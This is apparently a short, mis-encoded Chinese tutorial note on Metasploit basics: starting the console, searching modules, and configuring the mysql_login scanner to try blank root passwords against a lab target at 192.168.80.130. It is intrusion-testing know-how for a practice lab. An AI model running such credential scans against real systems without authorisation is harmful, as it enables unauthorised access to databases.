1.打開Metasploit?
systemctl start postgresql
systemctl enable postgresql? ? ?##搞成開機啟動
msfconsole? ? ###進(jìn)入控制臺

這玩意每次打開顯示的圖片都是不一樣的? 很有趣
connect 命令主要用于遠(yuǎn)程連接主機
試下看? connected 就是連接成功

輸入get 會發(fā)出一個請求? 可以看到web相關(guān)信息

search mysql? ? ##search 是查詢命令

search name:mysql? ? ? ? ? ? ? ? ?#要查找 mysql 數(shù)據(jù)庫的漏洞
search platform:mysql? ? ? ? ? ? ? #查詢平臺里包含mysql信息的模塊
search type:exploit? ? ? ? ? ? ? ? ?##還可以通過類型查找
search name:mysql type:exploit? ? ? ##聯(lián)合查詢
攻擊步驟
1.先search 查詢? ?
2.然后show options
3.set 參數(shù)??
4.run 開始攻擊
5.back退出
下面用下msf掃描一下靶機上的mysql上面的空密碼
靶機的地址是192.168.80130? 搞之前先ping一下子

首先搜索一下掃描mysql密碼的模塊
search mysql_login
就一個? ?auxiliary/scanner/mysql/mysql_login

加載模塊? use auxiliary/scanner/mysql/mysql_login

看模塊參數(shù)? ? ? show options

那個RHOSTS就是被攻擊的ip地址
set USERNAME root

set BLANK_PASSWORDS true
開啟為所有用戶嘗試空密碼
set RHOSTS 192.168.80.130
然后開搞
